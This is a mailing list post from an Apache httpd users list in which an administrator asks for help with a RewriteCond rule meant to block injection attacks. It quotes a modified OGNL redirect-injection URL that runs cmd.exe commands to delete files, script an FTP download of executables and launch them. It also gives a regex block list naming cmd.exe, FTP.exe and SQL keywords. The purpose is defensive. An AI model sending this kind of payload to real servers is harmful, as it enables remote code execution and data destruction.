httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Cabell, Jeff" <Jeff.Cab...@xerox.com>
Subject [users@httpd] RewriteCond help
Date Fri, 09 May 2014 17:06:38 GMT
We've noticed attempted injection attacks on one of our servers and even though the virus scanners
are halting the execution of the malicious code, there is still a level of penetration that
we are trying to stop.

Can anyone give me an idea why this url is not triggering the Rewrite rule below?

The intent is to redirect any url containing references to cmd.exe, ftp.exe, any .bat file,
or anything with a SQL Query embedded back to just pull up the site's homepage.

(Note : it is not the actual attack URL, but one that was modified to generate a harmless
file, but still mimic the attack method)

https://[IP redacted]/appname/disabilityInfo.action?redirect:$%7b(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27cmd.exe%27%2C%20%27%2Fd%20%2Fc%20md%20rewritetest%26cd%20rewritetest%26del%20*.*%20%2Ff%20%2Fs%20%2Fq%26echo%20bartsimpson.eat.my.shorts%20%3Ej%26echo%20homer%20%3E%3Ej%26echo%20mmmdoughnuts%20%3E%3Ej%26echo%20mget%20*.exe%20%3E%3Ej%26echo%20bye%20%3E%3Ej%26echo%20for%20%25%25i%20in%20(*.exe)%20do%20start%20%25%25i%20%3ED.bat%26echo%20for%20%25%25i%20in%20(*.exe)%20do%20%25%25i%20%3E%3ED.bat%26echo%20del%20%2Ff%20%2Fq%20%250%25%20%3E%3ED.bat%26D.bat%27%7D)).start()%7D


RewriteCond %{QUERY_STRING} .*(java\.lang|FTP\.exe|cmd\.exe|\.bat|\.exe|insert|delete|set|declare|drop|update).*
[NC]
RewriteRule ^(.*)$ https://[IP redacted]/ [F,L]


Any help would be greatly appreciated.

Jeff Cabell
Applications Administrator

Mime
View raw message